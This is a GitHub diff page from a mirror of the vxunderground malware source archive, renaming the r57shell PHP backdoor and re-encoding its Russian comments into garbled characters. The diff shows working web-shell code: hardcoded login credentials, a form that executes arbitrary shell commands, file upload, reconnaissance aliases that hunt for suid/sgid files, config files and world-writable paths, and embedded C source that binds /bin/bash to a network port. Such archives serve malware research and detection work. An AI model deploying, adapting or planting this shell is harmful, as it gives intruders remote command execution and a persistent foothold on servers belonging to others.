mirror of
https://github.com/vxunderground/MalwareSourceCode
synced 2024-06-20 14:08:37 +00:00
Rename Backdoor.PHP.Rst.am to Backdoor.PHP.R57.a
This commit is contained in:
vxunderground
GitHub
parent
772532d020
commit
def1cb17c6
@ -10,33 +10,33 @@
|
|||||||
/*
|
/*
|
||||||
/* SPECIAL xbIx birthday edition
|
/* SPECIAL xbIx birthday edition
|
||||||
/*
|
/*
|
||||||
/* r57shell.php - скрипт на пхп позволяющий вам выполнять шелл команды на сервере через браузер
|
/* r57shell.php - ñêðèïò íà ïõï ïîçâîëÿþùèé âàì âûïîëíÿòü øåëë êîìàíäû íà ñåðâåðå ÷åðåç áðàóçåð
|
||||||
/* Вы можете скачать новую версию на нашем сайте: http://rst.void.ru или www.rsteam.ru
|
/* Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://rst.void.ru èëè www.rsteam.ru
|
||||||
/* Версия 1.0 beta (писалась практически на коленке... так что код сыроват... для тестирования)
|
/* Âåðñèÿ 1.0 beta (ïèñàëàñü ïðàêòè÷åñêè íà êîëåíêå... òàê ÷òî êîä ñûðîâàò... äëÿ òåñòèðîâàíèÿ)
|
||||||
/*
|
/*
|
||||||
/* Возможности:
|
/* Âîçìîæíîñòè:
|
||||||
/* ~ защита скрипта с помощью пароля
|
/* ~ çàùèòà ñêðèïòà ñ ïîìîùüþ ïàðîëÿ
|
||||||
/* ~ выполнение шелл-команд
|
/* ~ âûïîëíåíèå øåëë-êîìàíä
|
||||||
/* ~ загрузка файлов на сервер
|
/* ~ çàãðóçêà ôàéëîâ íà ñåðâåð
|
||||||
/* ~ поддерживает алиасы команд
|
/* ~ ïîääåðæèâàåò àëèàñû êîìàíä
|
||||||
/* ~ включены 4 алиаса команд:
|
/* ~ âêëþ÷åíû 4 àëèàñà êîìàíä:
|
||||||
/* - поиск на сервере всех файлов с suid битом
|
/* - ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì
|
||||||
/* - поиск на сервере всех файлов с sgid битом
|
/* - ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì
|
||||||
/* - поиск на сервере файлов config.inc.php
|
/* - ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php
|
||||||
/* - поиск на сервере всех директорий и файлов доступных на запись для всех
|
/* - ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ
|
||||||
/* ~ два языка интерфейса: русский, английский
|
/* ~ äâà ÿçûêà èíòåðôåéñà: ðóññêèé, àíãëèéñêèé
|
||||||
/* ~ возможность забиндить /bin/bash на определенный порт
|
/* ~ âîçìîæíîñòü çàáèíäèòü /bin/bash íà îïðåäåëåííûé ïîðò
|
||||||
/*
|
/*
|
||||||
/* 05.03.2004 (c) RusH security team
|
/* 05.03.2004 (c) RusH security team
|
||||||
/*
|
/*
|
||||||
/******************************************************************************************************/
|
/******************************************************************************************************/
|
||||||
|
|
||||||
## Аутентификация
|
## Àóòåíòèôèêàöèÿ
|
||||||
|
|
||||||
## Логин и пароль для доступа к скрипту
|
## Ëîãèí è ïàðîëü äëÿ äîñòóïà ê ñêðèïòó
|
||||||
## НЕ ЗАБУДЬТЕ СМЕНИТЬ ПЕРЕД РАЗМЕЩЕНИЕМ НА СЕРВЕРЕ!!!
|
## ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅÐÂÅÐÅ!!!
|
||||||
$name="r57"; ## логин пользователя
|
$name="r57"; ## ëîãèí ïîëüçîâàòåëÿ
|
||||||
$pass="r57"; ## пароль пользователя
|
$pass="r57"; ## ïàðîëü ïîëüçîâàòåëÿ
|
||||||
|
|
||||||
if(!isset($PHP_AUTH_USER))
|
if(!isset($PHP_AUTH_USER))
|
||||||
{
|
{
|
||||||
@ -59,28 +59,28 @@ set_time_limit(0);
|
|||||||
|
|
||||||
|
|
||||||
/*
|
/*
|
||||||
Выбор языка
|
Âûáîð ÿçûêà
|
||||||
$language='ru' - русский
|
$language='ru' - ðóññêèé
|
||||||
$language='eng' - английский
|
$language='eng' - àíãëèéñêèé
|
||||||
*/
|
*/
|
||||||
|
|
||||||
$language='ru';
|
$language='ru';
|
||||||
|
|
||||||
$lang=array(
|
$lang=array(
|
||||||
'ru_text1' => 'Выполненная команда',
|
'ru_text1' => 'Âûïîëíåííàÿ êîìàíäà',
|
||||||
'ru_text2' => 'Выполнение команд на сервере',
|
'ru_text2' => 'Âûïîëíåíèå êîìàíä íà ñåðâåðå',
|
||||||
'ru_text3' => 'Выполнить команду',
|
'ru_text3' => 'Âûïîëíèòü êîìàíäó',
|
||||||
'ru_text4' => 'Рабочая директория',
|
'ru_text4' => 'Ðàáî÷àÿ äèðåêòîðèÿ',
|
||||||
'ru_text5' => 'Загрузка файлов на сервер',
|
'ru_text5' => 'Çàãðóçêà ôàéëîâ íà ñåðâåð',
|
||||||
'ru_text6' => 'Локальный файл',
|
'ru_text6' => 'Ëîêàëüíûé ôàéë',
|
||||||
'ru_text7' => 'Алиасы',
|
'ru_text7' => 'Àëèàñû',
|
||||||
'ru_text8' => 'Выберите алиас',
|
'ru_text8' => 'Âûáåðèòå àëèàñ',
|
||||||
'ru_butt1' => 'Выполнить',
|
'ru_butt1' => 'Âûïîëíèòü',
|
||||||
'ru_butt2' => 'Загрузить',
|
'ru_butt2' => 'Çàãðóçèòü',
|
||||||
'ru_text9' => 'Открытие порта и привязка его к /bin/bash',
|
'ru_text9' => 'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash',
|
||||||
'ru_text10' => 'Открыть порт',
|
'ru_text10' => 'Îòêðûòü ïîðò',
|
||||||
'ru_text11' => 'Пароль для доступа',
|
'ru_text11' => 'Ïàðîëü äëÿ äîñòóïà',
|
||||||
'ru_butt3' => 'Открыть',
|
'ru_butt3' => 'Îòêðûòü',
|
||||||
|
|
||||||
'eng_text1' => 'Executed command',
|
'eng_text1' => 'Executed command',
|
||||||
'eng_text2' => 'Execute command on server',
|
'eng_text2' => 'Execute command on server',
|
||||||
@ -101,22 +101,22 @@ $lang=array(
|
|||||||
|
|
||||||
|
|
||||||
/*
|
/*
|
||||||
Алиасы команд
|
Àëèàñû êîìàíä
|
||||||
Позволяют избежать многократного набора одних и тех-же команд. ( Сделано благодаря моей природной лени )
|
Ïîçâîëÿþò èçáåæàòü ìíîãîêðàòíîãî íàáîðà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàðÿ ìîåé ïðèðîäíîé ëåíè )
|
||||||
Вы можете сами добавлять или изменять команды.
|
Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû.
|
||||||
*/
|
*/
|
||||||
|
|
||||||
$aliases=array(
|
$aliases=array(
|
||||||
/* поиск на сервере всех файлов с suid битом */
|
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */
|
||||||
'find all suid files' => 'find / -type f -perm -04000 -ls',
|
'find all suid files' => 'find / -type f -perm -04000 -ls',
|
||||||
|
|
||||||
/* поиск на сервере всех файлов с sgid битом */
|
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */
|
||||||
'find all sgid files' => 'find / -type f -perm -02000 -ls',
|
'find all sgid files' => 'find / -type f -perm -02000 -ls',
|
||||||
|
|
||||||
/* поиск на сервере файлов config.inc.php */
|
/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */
|
||||||
'find config.inc.php files' => 'find / -type f -name config.inc.php',
|
'find config.inc.php files' => 'find / -type f -name config.inc.php',
|
||||||
|
|
||||||
/* поиск на сервере всех директорий и файлов доступных на запись для всех */
|
/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
|
||||||
'find writable directories and files' => 'find / -perm -2 -ls',
|
'find writable directories and files' => 'find / -perm -2 -ls',
|
||||||
'----------------------------------------------------------------------------------------------------' => 'ls -la'
|
'----------------------------------------------------------------------------------------------------' => 'ls -la'
|
||||||
);
|
);
|
||||||
@ -137,7 +137,7 @@ int sockfd, newfd;
|
|||||||
char buf[30];
|
char buf[30];
|
||||||
struct sockaddr_in remote;
|
struct sockaddr_in remote;
|
||||||
if(argc < 3) usage(argv[0]);
|
if(argc < 3) usage(argv[0]);
|
||||||
if(fork() == 0) { // Ответвляем новый процесс
|
if(fork() == 0) { // Îòâåòâëÿåì íîâûé ïðîöåññ
|
||||||
remote.sin_family = AF_INET;
|
remote.sin_family = AF_INET;
|
||||||
remote.sin_port = htons(atoi(argv[1]));
|
remote.sin_port = htons(atoi(argv[1]));
|
||||||
remote.sin_addr.s_addr = htonl(INADDR_ANY);
|
remote.sin_addr.s_addr = htonl(INADDR_ANY);
|
||||||
@ -178,7 +178,7 @@ return 0;
|
|||||||
}";
|
}";
|
||||||
|
|
||||||
?>
|
?>
|
||||||
<!-- Здравствуй Вася -->
|
<!-- Çäðàâñòâóé Âàñÿ -->
|
||||||
<html>
|
<html>
|
||||||
<head>
|
<head>
|
||||||
<title>r57shell</title>
|
<title>r57shell</title>
|
||||||
@ -322,9 +322,9 @@ echo "</b>";
|
|||||||
/* command execute form */
|
/* command execute form */
|
||||||
echo "<form name=command method=post>";
|
echo "<form name=command method=post>";
|
||||||
echo "<font face=Verdana size=-2>";
|
echo "<font face=Verdana size=-2>";
|
||||||
echo "<b> ".$lang[$language._text3]." <font face=Wingdings color=gray>и</font> </b>";
|
echo "<b> ".$lang[$language._text3]." <font face=Wingdings color=gray>è</font> </b>";
|
||||||
echo "<input type=text name=cmd size=85> <br>";
|
echo "<input type=text name=cmd size=85> <br>";
|
||||||
echo "<b> ".$lang[$language._text4]." <font face=Wingdings color=gray>и</font> </b>";
|
echo "<b> ".$lang[$language._text4]." <font face=Wingdings color=gray>è</font> </b>";
|
||||||
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
|
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
|
||||||
else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
|
else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
|
||||||
echo " <input type=submit name=submit value=\" ".$lang[$language._butt1]." \">";
|
echo " <input type=submit name=submit value=\" ".$lang[$language._butt1]." \">";
|
||||||
@ -339,7 +339,7 @@ echo "</form>";
|
|||||||
/* file upload form */
|
/* file upload form */
|
||||||
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
|
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
|
||||||
echo "<font face=Verdana size=-2>";
|
echo "<font face=Verdana size=-2>";
|
||||||
echo "<b> ".$lang[$language._text6]." <font face=Wingdings color=gray>и</font> </b>";
|
echo "<b> ".$lang[$language._text6]." <font face=Wingdings color=gray>è</font> </b>";
|
||||||
echo "<input type=file name=userfile size=85> ";
|
echo "<input type=file name=userfile size=85> ";
|
||||||
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
|
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
|
||||||
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
|
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
|
||||||
@ -355,7 +355,7 @@ echo "</form>";
|
|||||||
/* aliases form */
|
/* aliases form */
|
||||||
echo "<form name=aliases method=POST>";
|
echo "<form name=aliases method=POST>";
|
||||||
echo "<font face=Verdana size=-2>";
|
echo "<font face=Verdana size=-2>";
|
||||||
echo "<b> ".$lang[$language._text8]." <font face=Wingdings color=gray>и</font> </b>";
|
echo "<b> ".$lang[$language._text8]." <font face=Wingdings color=gray>è</font> </b>";
|
||||||
echo "<select name=alias>";
|
echo "<select name=alias>";
|
||||||
foreach ($aliases as $alias_name=>$alias_cmd)
|
foreach ($aliases as $alias_name=>$alias_cmd)
|
||||||
{
|
{
|
||||||
@ -378,9 +378,9 @@ echo "</form>";
|
|||||||
/* port bind form */
|
/* port bind form */
|
||||||
echo "<form name=bind method=POST>";
|
echo "<form name=bind method=POST>";
|
||||||
echo "<font face=Verdana size=-2>";
|
echo "<font face=Verdana size=-2>";
|
||||||
echo "<b> ".$lang[$language._text10]." <font face=Wingdings color=gray>и</font> </b>";
|
echo "<b> ".$lang[$language._text10]." <font face=Wingdings color=gray>è</font> </b>";
|
||||||
echo "<input type=text name=port size=15 value=11457> ";
|
echo "<input type=text name=port size=15 value=11457> ";
|
||||||
echo "<b> ".$lang[$language._text11]." <font face=Wingdings color=gray>и</font> </b>";
|
echo "<b> ".$lang[$language._text11]." <font face=Wingdings color=gray>è</font> </b>";
|
||||||
echo "<input type=text name=bind_pass size=15 value=r57> ";
|
echo "<input type=text name=bind_pass size=15 value=r57> ";
|
||||||
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
|
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
|
||||||
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
|
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
|
||||||
Loading…
Reference in New Issue
Block a user